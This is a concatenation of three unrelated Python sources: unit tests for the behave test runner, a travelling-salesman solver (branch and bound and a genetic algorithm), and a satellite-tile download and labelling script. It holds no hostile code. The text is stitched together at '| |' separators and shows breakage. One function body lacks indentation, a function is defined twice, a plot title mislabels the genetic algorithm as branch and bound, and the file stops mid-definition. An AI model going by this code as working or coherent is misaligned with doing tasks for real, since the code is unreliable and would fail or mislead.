    def test_context_text_is_restored_after_execute_steps_with_text(self):
        doc = u'''
Given a step passes
When a step with text:
    """
    Lorem ipsum
    Ipsum lorem
    """
'''.lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            original_text = "<ORIGINAL_TEXT>"
            self.context.text = original_text
            self.context.execute_steps(doc)
            eq_(self.context.text, original_text)

    @raises(ValueError)
    def test_execute_steps_should_fail_when_called_without_feature(self):
        doc = u"""
Given a passes
Then a step passes
""".lstrip()
        with patch("behave.step_registry.registry", self.step_registry):
            self.context.feature = None
            self.context.execute_steps(doc)
def create_mock_config():
    """Return a Mock configuration with the default steps/environment paths."""
    config = Mock()
    config.environment_file = "environment.py"
    config.steps_dir = "steps"
    return config
class TestRunner(object):
    """Unit tests for behave.runner.Runner: hook loading/running, output
    capture setup/teardown, exec_file, and the run() return value."""
    # pylint: disable=invalid-name, no-self-use

    def test_load_hooks_execfiles_hook_file(self):
        with patch("behave.runner.exec_file") as ef:
            with patch("os.path.exists") as exists:
                exists.return_value = True
                base_dir = "fake/path"
                hooks_path = os.path.join(base_dir, "environment.py")
                r = runner.Runner(create_mock_config())
                r.base_dir = base_dir
                r.load_hooks()
                exists.assert_called_with(hooks_path)
                ef.assert_called_with(hooks_path, r.hooks)

    def test_run_hook_runs_a_hook_that_exists(self):
        config = Mock()
        r = runner.Runner(config)
        # XXX r.config = Mock()
        r.config.stdout_capture = False
        r.config.stderr_capture = False
        r.config.dry_run = False
        r.hooks["before_lunch"] = hook = Mock()
        args = (runner.Context(Mock()), Mock(), Mock())
        r.run_hook("before_lunch", *args)
        hook.assert_called_with(*args)

    def test_run_hook_does_not_runs_a_hook_that_exists_if_dry_run(self):
        r = runner.Runner(None)
        r.config = Mock()
        r.config.dry_run = True
        r.hooks["before_lunch"] = hook = Mock()
        args = (runner.Context(Mock()), Mock(), Mock())
        r.run_hook("before_lunch", *args)
        # Dry-run mode must skip the hook entirely.
        assert len(hook.call_args_list) == 0

    def test_setup_capture_creates_stringio_for_stdout(self):
        r = runner.Runner(Mock())
        r.config.stdout_capture = True
        r.config.log_capture = False
        r.context = Mock()
        r.setup_capture()
        assert r.capture_controller.stdout_capture is not None
        assert isinstance(r.capture_controller.stdout_capture, StringIO)

    def test_setup_capture_does_not_create_stringio_if_not_wanted(self):
        r = runner.Runner(Mock())
        r.config.stdout_capture = False
        r.config.stderr_capture = False
        r.config.log_capture = False
        r.setup_capture()
        assert r.capture_controller.stdout_capture is None

    @patch("behave.capture.LoggingCapture")
    def test_setup_capture_creates_memory_handler_for_logging(self, handler):
        r = runner.Runner(Mock())
        r.config.stdout_capture = False
        r.config.log_capture = True
        r.context = Mock()
        r.setup_capture()
        assert r.capture_controller.log_capture is not None
        handler.assert_called_with(r.config)
        r.capture_controller.log_capture.inveigle.assert_called_with()

    def test_setup_capture_does_not_create_memory_handler_if_not_wanted(self):
        r = runner.Runner(Mock())
        r.config.stdout_capture = False
        r.config.stderr_capture = False
        r.config.log_capture = False
        r.setup_capture()
        assert r.capture_controller.log_capture is None

    def test_start_stop_capture_switcheroos_sys_stdout(self):
        # Swap in a mock stdout so the capture round-trip can be observed.
        old_stdout = sys.stdout
        sys.stdout = new_stdout = Mock()
        r = runner.Runner(Mock())
        r.config.stdout_capture = True
        r.config.log_capture = False
        r.context = Mock()
        r.setup_capture()
        r.start_capture()
        eq_(sys.stdout, r.capture_controller.stdout_capture)
        r.stop_capture()
        eq_(sys.stdout, new_stdout)
        sys.stdout = old_stdout

    def test_start_stop_capture_leaves_sys_stdout_alone_if_off(self):
        r = runner.Runner(Mock())
        r.config.stdout_capture = False
        r.config.log_capture = False
        old_stdout = sys.stdout
        r.start_capture()
        eq_(sys.stdout, old_stdout)
        r.stop_capture()
        eq_(sys.stdout, old_stdout)

    def test_teardown_capture_removes_log_tap(self):
        r = runner.Runner(Mock())
        r.config.stdout_capture = False
        r.config.log_capture = True
        r.capture_controller.log_capture = Mock()
        r.teardown_capture()
        r.capture_controller.log_capture.abandon.assert_called_with()

    def test_exec_file(self):
        # exec_file() should execute the file and expose __file__ plus the
        # file's own bindings in the supplied locals dict.
        fn = tempfile.mktemp()
        with open(fn, "w") as f:
            f.write("spam = __file__\n")
        g = {}
        l = {}
        runner.exec_file(fn, g, l)
        assert "__file__" in l
        # pylint: disable=too-many-format-args
        assert "spam" in l, '"spam" variable not set in locals (%r)' % (g, l)
        # pylint: enable=too-many-format-args
        eq_(l["spam"], fn)

    def test_run_returns_true_if_everything_passed(self):
        r = runner.Runner(Mock())
        r.setup_capture = Mock()
        r.setup_paths = Mock()
        r.run_with_paths = Mock()
        r.run_with_paths.return_value = True
        assert r.run()

    def test_run_returns_false_if_anything_failed(self):
        r = runner.Runner(Mock())
        r.setup_capture = Mock()
        r.setup_paths = Mock()
        r.run_with_paths = Mock()
        r.run_with_paths.return_value = False
        assert not r.run()
class TestRunWithPaths(unittest.TestCase):
    """Tests for Runner.run_with_paths(): hook/step loading, hook ordering,
    and feature-file parsing, with most collaborators mocked out."""
    # pylint: disable=invalid-name, no-self-use

    def setUp(self):
        self.config = Mock()
        self.config.reporters = []
        self.config.logging_level = None
        self.config.logging_filter = None
        self.config.outputs = [Mock(), StreamOpener(stream=sys.stdout)]
        self.config.format = ["plain", "progress"]
        self.runner = runner.Runner(self.config)
        # Stub out every collaborator so only run_with_paths() itself runs.
        self.load_hooks = self.runner.load_hooks = Mock()
        self.load_step_definitions = self.runner.load_step_definitions = Mock()
        self.run_hook = self.runner.run_hook = Mock()
        self.run_step = self.runner.run_step = Mock()
        self.feature_locations = self.runner.feature_locations = Mock()
        self.calculate_summaries = self.runner.calculate_summaries = Mock()
        self.formatter_class = patch("behave.formatter.pretty.PrettyFormatter")
        formatter_class = self.formatter_class.start()
        formatter_class.return_value = self.formatter = Mock()

    def tearDown(self):
        self.formatter_class.stop()

    def test_loads_hooks_and_step_definitions(self):
        self.feature_locations.return_value = []
        self.runner.run_with_paths()
        assert self.load_hooks.called
        assert self.load_step_definitions.called

    def test_runs_before_all_and_after_all_hooks(self):
        # Make runner.feature_locations() and runner.run_hook() the same mock so
        # we can make sure things happen in the right order.
        self.runner.feature_locations = self.run_hook
        self.runner.feature_locations.return_value = []
        self.runner.context = Mock()
        self.runner.run_with_paths()
        eq_(self.run_hook.call_args_list, [
            ((), {}),
            (("before_all", self.runner.context), {}),
            (("after_all", self.runner.context), {}),
        ])

    @patch("behave.parser.parse_file")
    @patch("os.path.abspath")
    def test_parses_feature_files_and_appends_to_feature_list(self, abspath,
                                                              parse_file):
        feature_locations = ["one", "two", "three"]
        feature = Mock()
        feature.tags = []
        feature.__iter__ = Mock(return_value=iter([]))
        feature.run.return_value = False
        self.runner.feature_locations.return_value = feature_locations
        # abspath is mocked to uppercase, so we can tell it was applied.
        abspath.side_effect = lambda x: x.upper()
        self.config.lang = "fritz"
        self.config.format = ["plain"]
        self.config.outputs = [StreamOpener(stream=sys.stdout)]
        self.config.output.encoding = None
        self.config.exclude = lambda s: False
        self.config.junit = False
        self.config.summary = False
        parse_file.return_value = feature
        self.runner.run_with_paths()
        expected_parse_file_args = \
            [((x.upper(),), {"language": "fritz"}) for x in feature_locations]
        eq_(parse_file.call_args_list, expected_parse_file_args)
        eq_(self.runner.features, [feature] * 3)
class FsMock(object):
    """In-memory stand-in for os.path (and os.walk) used to test path setup.

    Construct it with POSIX-style path strings; a trailing separator marks a
    directory.  Every query made through it is recorded in ``self.calls`` so
    tests can assert which lookups happened.
    """

    def __init__(self, *paths):
        self.base = os.path.abspath(".")
        self.sep = os.path.sep
        # This bit of gymnastics is to support Windows. We feed in a bunch of
        # paths in places using FsMock that assume that POSIX-style paths
        # work. This is faster than fixing all of those but at some point we
        # should totally do it properly with os.path.join() and all that.
        def full_split(path):
            bits = []
            while path:
                path, bit = os.path.split(path)
                bits.insert(0, bit)
            return bits
        paths = [os.path.join(self.base, *full_split(path)) for path in paths]
        print(repr(paths))
        self.paths = paths
        self.files = set()
        self.dirs = defaultdict(list)
        separators = [sep for sep in (os.path.sep, os.path.altsep) if sep]
        for path in paths:
            if path[-1] in separators:
                # Trailing separator: a directory.  Register it and every
                # ancestor directory chain up to the root.
                self.dirs[path[:-1]] = []
                d, p = os.path.split(path[:-1])
                while d and p:
                    self.dirs[d].append(p)
                    d, p = os.path.split(d)
            else:
                # A plain file: record it and add it to its parent directory.
                self.files.add(path)
                d, f = os.path.split(path)
                self.dirs[d].append(f)
        self.calls = []

    def listdir(self, dir):
        # pylint: disable=W0622
        #   W0622   Redefining built-in dir
        self.calls.append(("listdir", dir))
        return self.dirs.get(dir, [])

    def isfile(self, path):
        self.calls.append(("isfile", path))
        return path in self.files

    def isdir(self, path):
        self.calls.append(("isdir", path))
        return path in self.dirs

    def exists(self, path):
        self.calls.append(("exists", path))
        return path in self.dirs or path in self.files

    def walk(self, path, locations=None):
        # Depth-first emulation of os.walk over the fake directory tree;
        # `locations` accumulates (dirpath, dirnames, filenames) tuples.
        if locations is None:
            assert path in self.dirs, "%s not in %s" % (path, self.dirs)
            locations = []
        dirnames = []
        filenames = []
        for e in self.dirs[path]:
            if os.path.join(path, e) in self.dirs:
                dirnames.append(e)
                self.walk(os.path.join(path, e), locations)
            else:
                filenames.append(e)
        locations.append((path, dirnames, filenames))
        return locations

    # utilities that we need
    # pylint: disable=no-self-use
    def dirname(self, path, orig=os.path.dirname):
        return orig(path)

    def abspath(self, path, orig=os.path.abspath):
        return orig(path)

    def join(self, x, y, orig=os.path.join):
        return orig(x, y)

    def split(self, path, orig=os.path.split):
        return orig(path)

    def splitdrive(self, path, orig=os.path.splitdrive):
        return orig(path)
class TestFeatureDirectory(object):
    """Tests for Runner.setup_paths() with the flat features/steps layout."""
    # pylint: disable=invalid-name, no-self-use

    def test_default_path_no_steps(self):
        config = create_mock_config()
        config.paths = []
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock()
        # will look for a "features" directory and not find one
        with patch("os.path", fs):
            assert_raises(ConfigError, r.setup_paths)
        ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)

    def test_default_path_no_features(self):
        config = create_mock_config()
        config.paths = []
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock("features/steps/")
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                assert_raises(ConfigError, r.setup_paths)

    def test_default_path(self):
        config = create_mock_config()
        config.paths = []
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock("features/steps/", "features/foo.feature")
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    r.setup_paths()
        eq_(r.base_dir, os.path.abspath("features"))

    def test_supplied_feature_file(self):
        config = create_mock_config()
        config.paths = ["foo.feature"]
        config.verbose = True
        r = runner.Runner(config)
        r.context = Mock()
        fs = FsMock("steps/", "foo.feature")
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    r.setup_paths()
        ok_(("isdir", os.path.join(fs.base, "steps")) in fs.calls)
        ok_(("isfile", os.path.join(fs.base, "foo.feature")) in fs.calls)
        eq_(r.base_dir, fs.base)

    def test_supplied_feature_file_no_steps(self):
        config = create_mock_config()
        config.paths = ["foo.feature"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock("foo.feature")
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    assert_raises(ConfigError, r.setup_paths)

    def test_supplied_feature_directory(self):
        config = create_mock_config()
        config.paths = ["spam"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock("spam/", "spam/steps/", "spam/foo.feature")
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    r.setup_paths()
        ok_(("isdir", os.path.join(fs.base, "spam", "steps")) in fs.calls)
        eq_(r.base_dir, os.path.join(fs.base, "spam"))

    def test_supplied_feature_directory_no_steps(self):
        config = create_mock_config()
        config.paths = ["spam"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock("spam/", "spam/foo.feature")
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                assert_raises(ConfigError, r.setup_paths)
        ok_(("isdir", os.path.join(fs.base, "spam", "steps")) in fs.calls)

    def test_supplied_feature_directory_missing(self):
        config = create_mock_config()
        config.paths = ["spam"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock()
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                assert_raises(ConfigError, r.setup_paths)
class TestFeatureDirectoryLayout2(object):
    """Tests for Runner.setup_paths() with the nested features/group layout."""
    # pylint: disable=invalid-name, no-self-use

    def test_default_path(self):
        config = create_mock_config()
        config.paths = []
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock(
            "features/",
            "features/steps/",
            "features/group1/",
            "features/group1/foo.feature",
        )
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    r.setup_paths()
        eq_(r.base_dir, os.path.abspath("features"))

    def test_supplied_root_directory(self):
        config = create_mock_config()
        config.paths = ["features"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock(
            "features/",
            "features/group1/",
            "features/group1/foo.feature",
            "features/steps/",
        )
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    r.setup_paths()
        ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
        eq_(r.base_dir, os.path.join(fs.base, "features"))

    def test_supplied_root_directory_no_steps(self):
        config = create_mock_config()
        config.paths = ["features"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock(
            "features/",
            "features/group1/",
            "features/group1/foo.feature",
        )
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    assert_raises(ConfigError, r.setup_paths)
        ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
        eq_(r.base_dir, None)

    def test_supplied_feature_file(self):
        config = create_mock_config()
        config.paths = ["features/group1/foo.feature"]
        config.verbose = True
        r = runner.Runner(config)
        r.context = Mock()
        fs = FsMock(
            "features/",
            "features/group1/",
            "features/group1/foo.feature",
            "features/steps/",
        )
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    r.setup_paths()
        ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
        ok_(("isfile", os.path.join(fs.base, "features", "group1", "foo.feature")) in fs.calls)
        eq_(r.base_dir, fs.join(fs.base, "features"))

    def test_supplied_feature_file_no_steps(self):
        config = create_mock_config()
        config.paths = ["features/group1/foo.feature"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock(
            "features/",
            "features/group1/",
            "features/group1/foo.feature",
        )
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    assert_raises(ConfigError, r.setup_paths)

    def test_supplied_feature_directory(self):
        config = create_mock_config()
        config.paths = ["features/group1"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock(
            "features/",
            "features/group1/",
            "features/group1/foo.feature",
            "features/steps/",
        )
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                with r.path_manager:
                    r.setup_paths()
        ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
        eq_(r.base_dir, os.path.join(fs.base, "features"))

    def test_supplied_feature_directory_no_steps(self):
        config = create_mock_config()
        config.paths = ["features/group1"]
        config.verbose = True
        r = runner.Runner(config)
        fs = FsMock(
            "features/",
            "features/group1/",
            "features/group1/foo.feature",
        )
        with patch("os.path", fs):
            with patch("os.walk", fs.walk):
                assert_raises(ConfigError, r.setup_paths)
        ok_(("isdir", os.path.join(fs.base, "features", "steps")) in fs.calls)
| |
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
from math import sqrt
import random
import copy as copy
import sys
class TspBNB(object):
    """
    Exact TSP solver using branch and bound.  Construct with the town
    coordinates, call the instance to solve, then read ``path`` (a closed
    tour as a list of town indices) and ``fopt`` (its length), or plot.
    """

    def __init__(self, dataX, dataY):
        """
        Args:
            dataX (array): A 1xN array of x-points.
            dataY (array): A 1xN array of y-points.
        """
        self.xy = np.array([dataX, dataY])
        self.path = []          # best tour found (closed: first == last town)
        self.fopt = None        # length of the best tour
        self.dist = self._distance_matrix()

    def plot(self, solution=0, distance=0):
        """
        Args:
            solution (bool): Set to true if the XY points and solution are to
                be plotted
            distance (bool): Set to true if the distance matrix is to be
                plotted
        """
        if solution:
            for ii in range(len(self.path) - 1):
                plt.gca().plot([self.xy[0][self.path[ii]], self.xy[0][self.path[ii + 1]]],
                               [self.xy[1][self.path[ii]], self.xy[1][self.path[ii + 1]]], 'k')
            plt.gca().plot(self.xy[0], self.xy[1], 'ro', markersize=5)
            for i in range(len(self.xy[0])):
                plt.gca().annotate("#" + str(i), (self.xy[0][i], self.xy[1][i]))
            plt.title(('Optimal solution to the TSP (black) with connected towns,\n' +
                       '(red) using the branch and bound method'))
        if distance:
            ax = plt.gca()
            cax = ax.matshow(self.dist, interpolation='nearest')
            # Raw string: '\in' / '\mathbb' are TeX markup, not escapes.
            plt.title(r'Distance matrix $\in\mathbb{R}^{NxN}$ from town i to town j')
            plt.colorbar(cax)

    def _distance_matrix(self):
        """
        Generates and returns the Euclidean distance matrix for the xy points.
        """
        nelm = len(self.xy[0])

        def dist(ii, jj):
            return (sqrt((self.xy[0][ii] - self.xy[0][jj]) ** 2 +
                         (self.xy[1][ii] - self.xy[1][jj]) ** 2))

        return np.array([np.array([dist(ii, jj) for jj in range(nelm)]) for ii in range(nelm)])

    def __call__(self):
        """
        Solves the traveling salesman problem using information set in the
        constructor; stores the result in ``self.path`` and ``self.fopt``.
        """
        sys.stdout.write('Starting BnB TSP solver... ')
        nelm = len(self.xy[0])
        # Per-town [min, max] distance to any other town (diagonal excluded);
        # used to build the lower/upper bound estimates.
        minmax = np.zeros([nelm, 2])
        for ii in range(nelm):
            others = np.concatenate((self.dist[:ii, ii], self.dist[ii + 1:, ii]))
            minmax[ii][0] = others.min()
            minmax[ii][1] = others.max()
        startx = [0]
        bounds = self._boundy(startx, minmax)
        # The initial upper bound prunes everything provably worse.
        path, fopt = self._branchandbound(startx, minmax, bounds[1])
        self.path = path
        self.fopt = fopt
        sys.stdout.write('Complete!\n')
        sys.stdout.flush()

    def _boundy(self, x, minmax):
        """Return [lower, upper] bounds on tours extending partial path x."""
        nelm = len(self.xy[0])
        bounds = np.array([0.0, 0.0])
        # Exact cost of the edges already fixed by the partial path.
        for ii in range(len(x) - 1):
            bounds = bounds + self.dist[x[ii]][x[ii + 1]]
        non_visited = [ii for ii in range(nelm) if ii not in x]
        if non_visited:
            # Each remaining town contributes at least its nearest-neighbor
            # distance and at most its farthest-neighbor distance.
            for ii in non_visited:
                bounds = bounds + minmax[ii][:]
        elif len(x) <= nelm:
            # All towns visited but the tour is not closed yet: bound the
            # return leg to the start town.
            bounds = bounds + minmax[x[0]][:]
        return bounds

    def _branchy(self, x):
        """Return all child paths of partial path x (closing it when full)."""
        nelm = len(self.xy[0])
        if len(x) == nelm:
            return [x + [x[0]]]
        return [x + [ii] for ii in range(nelm) if ii not in x]

    def _branchandbound(self, x, minmax, fopt):
        """Depth-first branch and bound; returns (best path, best cost)."""
        bounds = self._boundy(x, minmax)
        if bounds[0] == bounds[1]:
            # Leaf: x is a complete closed tour and its cost is exact.
            if bounds[1] < fopt:
                fopt = bounds[1]
        else:
            X = self._branchy(x)
            B = [self._boundy(child, minmax).tolist() for child in X]
            # Best-first: explore children in order of ascending bounds and
            # prune any whose lower bound cannot beat the incumbent.
            for ii in [i[0] for i in sorted(enumerate(B), key=lambda b: b[1])]:
                if B[ii][0] < fopt:
                    xNew, foptNew = self._branchandbound(X[ii][:], minmax, fopt)
                    if foptNew < fopt:
                        fopt = foptNew
                        x = xNew
        return x, fopt
class TspGA(object):
    """Approximate TSP solver using a simple genetic algorithm with
    flip/swap/slide mutations and 4-way tournament selection."""

    def __init__(self, dataX, dataY, ):
        """
        Args:
            dataX (array): A 1xN array of x-points.
            dataY (array): A 1xN array of y-points.
        """
        self.xy = np.array([dataX, dataY])
        self.populationSize = 100   # candidate tours per generation
        self.iterationLim = 1000    # number of generations
        self.solutionHistory = []   # best tour cost per generation
        self.path = []              # best tour found (closed)
        self.dist = self._distance_matrix()

    def plot(self, points = 0, distance = 0, solution = 0, solutionHistory = 0):
        """
        Args:
            points (bool): Set to true if the XY points are to be plotted
        """
        if solution:
            for ii in range(len(self.path) - 1):
                plt.gca().plot([self.xy[0][self.path[ii]], self.xy[0][self.path[ii + 1]]],
                               [self.xy[1][self.path[ii]], self.xy[1][self.path[ii + 1]]], 'k')
            plt.gca().plot(self.xy[0], self.xy[1],'ro', markersize=5)
            plt.xlabel('x'), plt.ylabel('y')
            plt.title('Approximate solution to the TSP (black) with connected towns,\n'+
                      '(red) using the branch and bound method')
            for i in range(len(self.xy[0])):
                plt.gca().annotate("#" + str(i), (self.xy[0][i],self.xy[1][i]))
        if distance:
            plt.gca().matshow(self.dist)
            plt.title('Distance matrix $\in\mathbb{R}^{NxN}$ from town i to town j')
        if solutionHistory:
            plt.gca().plot([ii for ii in range(self.iterationLim)], self.solutionHistory)
            plt.title('Path distance (cost) as a function of the iterationnumber')
            plt.ylabel('Cost'), plt.xlabel('Number of iterations')
        plt.show()

    def _distance_matrix(self):
        """
        Generates a distance matrix for the specified xy points.
        """
        def dist(ii, jj):
            """
            Calculates a distance between two points at indices ii and jj in
            the xy data matrix.

            ARGS:
                ii, jj (int): Indices
            """
            return (sqrt((self.xy[0][ii] - self.xy[0][jj]) ** 2 + (self.xy[1][ii] - self.xy[1][jj]) ** 2))
        return np.array([np.array([dist(ii, jj) for jj in range(len(self.xy[0]))]) for ii in range(len(self.xy[0]))])

    def __call__(self):
        # Generates a population
        print('Starting GA solver...')
        n = len(self.xy[0])
        # First member keeps the identity tour; the rest are random shuffles.
        population = np.array([[ii for ii in range(n)] for jj in range(self.populationSize)])
        for ii in range(1, self.populationSize):
            random.shuffle(population[ii])
        for iteration in range(self.iterationLim):
            self.print_progress(iteration, self.iterationLim, 'Status:', 'complete.')
            # Computes the total distance for each population member
            populationDist = np.array([sum([self.dist[population[jj][ii - 1], population[jj][ii]] for ii in range(n)]) for jj in range(self.populationSize)])
            randomizedIndices = [ii for ii in range(self.populationSize)]
            random.shuffle(randomizedIndices)
            path, minDistance = self._bestSolution(population)
            self.path = path + [path[0]]
            self.solutionHistory.append([minDistance])
            newPopulation = []
            # Tournament selection: groups of 4; the winner breeds 3 mutants.
            for ii in range(self.populationSize // 4):
                selectedPopulations = population[randomizedIndices[4 * ii : 4 * (ii + 1)]]
                selectedDistances = populationDist[randomizedIndices[4 * ii : 4 * (ii + 1)]]
                index = np.where(selectedDistances == selectedDistances.min())[0][0]
                bestRoute = selectedPopulations[index]
                breakPoints = [random.randint(0, n - 1), random.randint(0, n - 1)]
                breakPoints.sort(key=int)
                offspring = copy.copy(bestRoute)
                flip = copy.copy(bestRoute).tolist() #Flip
                flipSection = flip[breakPoints[0]:breakPoints[1]]
                flipSection.reverse()
                flip = flip[:breakPoints[0]] + flipSection + flip[breakPoints[1]:]
                offspring = np.append([offspring], [flip], axis=0)
                swap = copy.copy(bestRoute) #Swap
                swap[breakPoints[0]], swap[breakPoints[1]] = swap[breakPoints[1]], swap[breakPoints[0]]
                offspring = np.append(offspring, [swap], axis=0)
                slide = copy.copy(bestRoute).tolist() #Slide
                poppedElement = slide.pop(breakPoints[1])
                slide.insert(breakPoints[0], poppedElement)
                offspring = np.append(offspring, [slide], axis=0)
                # NOTE(review): `== []` is a plain-list check only on the first
                # pass; once newPopulation is an ndarray this compares
                # elementwise — `len(newPopulation) == 0` would be safer. TODO confirm.
                if newPopulation == []:
                    newPopulation = offspring
                else:
                    newPopulation = np.append(newPopulation, offspring, axis=0)
            population = newPopulation

    def _bestSolution(self, population):
        # Returns (best tour as list, its total distance) for the population.
        populationDist = np.array([sum([self.dist[population[jj][ii - 1], population[jj][ii]] for ii in range(len(population[0]))]) for jj in range(self.populationSize)])
        index = np.where(populationDist == populationDist.min())
        return population[index[0][0]].tolist(), populationDist.min()

    def print_progress(self, iteration, total, prefix = '', suffix = '', decimals = 2, barLength = 30):
        """
        Prints progress bar in terminal window

        Args:
            iteration   - positive integer. The current iteration.
            total       - positive integer > iteration. The total number of iterations before completion.
            prefix      - string. Empty by default, specifies text before the progress bar.
            suffix      - string. Empty by default, specifies text after the progress bar.
            decimals    - positive integer. number of decimals in the percentage calculation.
            barLength   - positive, non-zero integer. Set to 30 # by default.
        """
        filledLength = int(round(barLength * iteration / float(total)))
        percents = round(100.00 * (iteration / float(total)), decimals)
        bar = '#' * filledLength + '-' * (barLength - filledLength)
        sys.stdout.write('%s [%s] %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
        sys.stdout.flush()
        if iteration == total-1:
            sys.stdout.write('Complete!' + ' ' * (barLength + 20) + '\n')
| |
import numpy as np
from urllib import urlretrieve
import ipdb
import matplotlib.pylab as pl
# Create your own satellite-image-only map on mapbox.
# I deleted the following one to prevent future charges,
# but the address should look something like this.
# Base URL of the custom Mapbox satellite tile set; 'Z/X/Y.png' tile paths
# are appended to this when downloading.
http_base='http://api.tiles.mapbox.com/v2/rkeisler.gh8kebdo/'
# Define the path for saving stuff.
basepath = '/Users/rkeisler/Desktop/satellite/'
imgpath = basepath+'img/'      # downloaded tile images live here
labelpath = basepath+'label/'  # hand-labeling CSV files live here
def do_everything():
    """End-to-end pipeline: download Austin ('atx') tiles at zoom 19,
    hand-label a subset, build the pool color bank, train the classifier,
    score every downloaded tile, and dump detections to CSV."""
    download_chunk('atx',19)
    label_data('atx', size=2000)
    get_colors(name='pool',ncolors=10, quick=False)
    rf, colors = train_classifier(prefix='atx', nside=32, ds=4, color_thresh=30)
    xtile, ytile, proba = predict_proba_all(rf, colors)
    write_to_csv(xtile, ytile, proba, 'atx')
def latlong_to_xyz(lat_deg, lon_deg, zoom):
    """Convert WGS84 lat/long (degrees) to slippy-map tile indices.

    Standard OSM/Mapbox tile scheme: n = 2**zoom tiles per axis,
    x grows eastward, y grows southward. Returns (xtile, ytile, zoom)
    as ints. (Removed the unused `lon_rad` local from the original.)
    """
    lat_rad = lat_deg * np.pi / 180.
    n = 2. ** zoom  # number of tiles along one axis at this zoom
    xtile = n * ((lon_deg + 180) / 360)
    ytile = n * (1 - (np.log(np.tan(lat_rad) + 1. / np.cos(lat_rad)) / np.pi)) / 2.
    return int(xtile), int(ytile), zoom
def xyz_to_latlong(x, y, zoom):
    """Inverse of latlong_to_xyz: tile indices -> (lat_deg, lon_deg) of
    the tile's north-west corner."""
    tiles = 2.0 ** zoom
    lon_deg = x / tiles * 360.0 - 180.0
    lat_deg = np.degrees(np.arctan(np.sinh(np.pi * (1 - 2 * y / tiles))))
    return (lat_deg, lon_deg)
# NOTE(review): exact duplicate of latlong_to_xyz defined earlier in this
# file -- this second definition silently shadows the first. Consider
# removing one of them. `lon_rad` below is computed but never used.
def latlong_to_xyz(lat_deg, lon_deg, zoom):
    """Convert WGS84 lat/long (degrees) to slippy-map tile indices;
    returns (xtile, ytile, zoom) as ints."""
    lat_rad = lat_deg*np.pi/180.
    lon_rad = lon_deg*np.pi/180.
    n = 2. ** zoom
    xtile = n * ((lon_deg + 180) / 360)
    ytile = n * (1 - (np.log(np.tan(lat_rad) + 1./np.cos(lat_rad)) / np.pi)) / 2.
    return int(xtile), int(ytile), zoom
def xyz_to_ZXY_string(x, y, z):
    """Format tile coords as the 'Z/X/Y.png' path segment used by the server."""
    return '%i/%i/%i.png' % (z, x, y)
def latlong_to_ZXY_string(lat_deg, lon_deg, zoom):
    """Tile-path string for the tile containing the given lat/long at `zoom`."""
    tile_x, tile_y, tile_z = latlong_to_xyz(lat_deg, lon_deg, zoom)
    return xyz_to_ZXY_string(tile_x, tile_y, tile_z)
def latlong_rectange_to_xyz(lat1, lat2, lon1, lon2, zoom):
    """Tile-index bounding box (x_min, x_max, y_min, y_max) covering a
    lat/long rectangle.

    Note tile y DECREASES as latitude increases, hence min-lat gives y_max.
    """
    lat_lo = np.min([lat1, lat2])
    lat_hi = np.max([lat1, lat2])
    lon_lo = np.min([lon1, lon2])
    lon_hi = np.max([lon1, lon2])
    x_min, y_max, zoom = latlong_to_xyz(lat_lo, lon_lo, zoom)
    x_max, y_min, zoom = latlong_to_xyz(lat_hi, lon_hi, zoom)
    return x_min, x_max, y_min, y_max
def xyz_to_savename(x, y, z, prefix='tmp'):
    """Local filename encoding tile coords, e.g. 'tmp_x1_y2_z3.png'."""
    return '%s_x%i_y%i_z%i.png' % (prefix, x, y, z)
def xyz_from_filename(filename):
    """Recover (x, y, z) tile coords from a filename made by xyz_to_savename."""
    stem = filename.split('/')[-1]

    def field(tag):
        # Integer following the LAST occurrence of `tag`, up to '_' or '.'.
        return int(stem.split(tag)[-1].split('_')[0].split('.')[0])

    return field('x'), field('y'), field('z')
def hms_to_deg(hour, min, sec):
return np.sign(hour)*(np.abs(hour)+min/60.+sec/3600.)
def download_one(x, y, zoom, prefix='tmp'):
    """Fetch one map tile from the tile server and save it under imgpath.

    Bug fix: xyz_to_ZXY_string() already ends in '.png', so the original
    appended a second '.png', producing URLs ending in '.png.png'.
    """
    url = http_base + xyz_to_ZXY_string(x, y, zoom)
    savename = imgpath + xyz_to_savename(x, y, zoom, prefix=prefix)
    urlretrieve(url, savename)
def download_chunk(name, zoom, download=True):
    """Download every tile in the named region (see define_chunk) at `zoom`."""
    region = define_chunk(name)
    download_rectangle(region['lat1'], region['lat2'],
                       region['lon1'], region['lon2'],
                       zoom, prefix=region['prefix'],
                       download=download)
def download_rectangle(lat1, lat2, lon1, lon2,
zoom, prefix='tmp', download=True):
